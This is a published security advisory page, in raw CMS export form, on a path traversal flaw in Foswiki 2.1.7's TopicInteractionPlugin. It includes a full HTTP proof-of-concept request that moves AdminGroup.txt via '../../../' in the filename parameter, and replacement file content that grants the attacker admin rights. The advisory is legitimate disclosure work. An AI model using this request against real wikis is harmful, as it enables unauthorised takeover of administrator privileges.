{"id":20305,"date":"2023-06-16T15:45:53","date_gmt":"2023-06-16T13:45:53","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=20305"},"modified":"2023-06-30T14:00:33","modified_gmt":"2023-06-30T12:00:33","slug":"usd-2022-0014","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0014\/","title":{"rendered":"usd-2022-0014"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.21.0\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

usd-2022-0014 | Foswiki 2.1.7 Path Traversal<\/h1>\n

<\/strong><\/p>\n

Advisory ID:<\/strong> usd-2022-0014
\nProduct:<\/strong> Foswiki
\nAffected Version:<\/strong> 2.1.7
\nVulnerability Type: https:\/\/cwe.mitre.org\/data\/definitions\/23.html<\/a><\/strong>
\nSecurity Risk:<\/strong> High
\nVendor URL:<\/strong> https:\/\/foswiki.org<\/a>
\nVendor acknowledged vulnerability:<\/strong> Yes
\nVendor Status:<\/strong> Fixed
\nAdvisory Status:<\/strong> Closed
\nLast Update:<\/strong> 2022-01-22<\/p>\n

Description<\/h1>\n

The TopicInteractionPlugin<\/strong> allows relative path traversal by changing the filename<\/strong> parameter. The plugin moves attachments to other wiki pages. These attachments are stored in pub\/<web>\/<topic><\/strong> directory. The content of the wiki pages are stored in data\/<\/strong> directory. Going back three directories allows to move files outside the pub<\/strong> directory (e.g. the AdminGroup.txt file which handles the permissions to the backend configuration pages.)<\/p>\n

Proof of Concept<\/h1>\n

The following requests (re)moves the file AdminGroup.txt<\/strong> of the Main<\/em> web, which allows an attacker to create a new one afterwards and become AdminGroup<\/em> member.<\/p>\n

The following request remove the file \"AdminGroup.txt\":<\/p>\n

\n
<\/span>POST<\/span> \/bin\/rest\/TopicInteractionPlugin\/move<\/span> HTTP<\/span>\/<\/span>1.1\n<\/span>Host<\/span>:<\/span> localhost\n<\/span>User-Agent<\/span>:<\/span> Mozilla\/5.0 (X11; Linux x86_64; rv:100.0) Gecko\/20100101 Firefox\/100.0\n<\/span>Accept<\/span>:<\/span> application\/json, text\/javascript, *\/*; q=0.01\n<\/span>Accept-Language<\/span>:<\/span> en-US,en;q=0.5\n<\/span>Accept-Encoding<\/span>:<\/span> gzip, deflate\n<\/span>Content-Type<\/span>:<\/span> application\/x-www-form-urlencoded; charset=UTF-8\n<\/span>X-Requested-With<\/span>:<\/span> XMLHttpRequest\n<\/span>Content-Length<\/span>:<\/span> 129\n<\/span>Origin<\/span>:<\/span> http:\/\/localhost<\/a>\n<\/span>Connection<\/span>:<\/span> close\n<\/span>Referer<\/span>:<\/span> http:\/\/localhost\/Main\/ChrisChris<\/a>\n<\/span>Cookie<\/span>:<\/span> FOSWIKISID=582be25dd6c36a6d45e6a37277378374; FOSWIKISTRIKEONE=21d8825b6b492836f1235aa0293bc310\n<\/span>Sec-Fetch-Dest<\/span>:<\/span> empty\n<\/span>Sec-Fetch-Mode<\/span>:<\/span> cors\n<\/span>Sec-Fetch-Site<\/span>:<\/span> same-origin<\/span><\/pre>\n
validation_key=06f78c2c2612a63bf8a8eef6aee71544&id=move&filename=..\/..\/..\/data\/Main\/AdminGroup.txt&topic=Main.ChrisChris&newweb=Sandbox&newtopic=Test<\/p>\n<\/div>\n
 <\/p>\n
Afterwards a user can create a new one, which contains their username and become an admin.<\/p>\n
The following content can be used for a new AdminGroup.txt file.<\/p>\n
%META:TOPICINFO{author=\"BaseUserMapping_999\" comment=\"\" date=\"1648462765\" format=\"1.1\" version=\"1\"}%\n%META:TOPICPARENT{name=\"WikiGroups\"}%\n\n%INCLUDE{\"%USERSWEB%.AdminUser\" section=\"sudo_login\"}%\n\n%IF{\"(NOT defined GROUP) OR $GROUP = ''\" then='\n<sticky><div class=\"foswikiNotification\"><\/sticky>\n*How to add the first administrator* %BR%\nIf you haven\\'t previously set up an administrator, follow these steps: (*Note:* This help text will disappear once you have added a user to this group.)\n$percntINCLUDE{\"%SYSTEMWEB%.InstallationGuide\" section=\"addadmin\"}$percnt\n<sticky><\/div><\/sticky>'}%\n\nMore information on Administrators, and on how to use the AdminGroup is found in the [[%SYSTEMWEB%.InstallationGuide#DefineAdminUser][Installation Guide]]\n\nYou can edit this topic to add a description to the AdminGroup\n\n%META:PREFERENCE{name=\"GROUP\" title=\"GROUP\" type=\"Set\" value=\"\"}%\n%META:PREFERENCE{name=\"ALLOWTOPICCHANGE\" title=\"ALLOWTOPICCHANGE\" type=\"Set\" value=\"AdminGroup,ChrisChris\"}%\n%META:PREFERENCE{name=\"VIEW_TEMPLATE\" title=\"VIEW_TEMPLATE\" type=\"Set\" value=\"GroupView\"}<\/pre>\n
 <\/p>\n
The \"ALLOWTOPICCHANGE\" permission contains our username, which allows us to become an admin user.<\/p>\n
Fix<\/h1>\n
Restrict the movement of attachments to the pub<\/strong> directory.<\/p>\n
References<\/h1>\n
https:\/\/owasp.org\/www-community\/attacks\/Path_Traversal<\/a><\/p>\n
Timeline<\/h1>\n